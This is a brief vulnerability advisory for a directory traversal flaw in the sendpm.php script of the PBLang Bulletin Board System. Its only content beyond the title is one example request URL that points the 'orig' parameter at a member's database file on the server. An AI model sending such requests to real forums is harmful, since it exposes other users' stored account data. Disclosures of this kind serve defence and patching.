PBLang Bulletin Board System SendPM.PHP Directory Traversal Vulnerability

PBLang Bulletin Board System SendPM.PHP Directory Traversal Vulnerability

The following example is available:

http://www.example.com/pblang/sendpm.php?to=[username]&subj=[doesntmatter]&num=1&orig=/home/public_html/pblang/db/members/[username]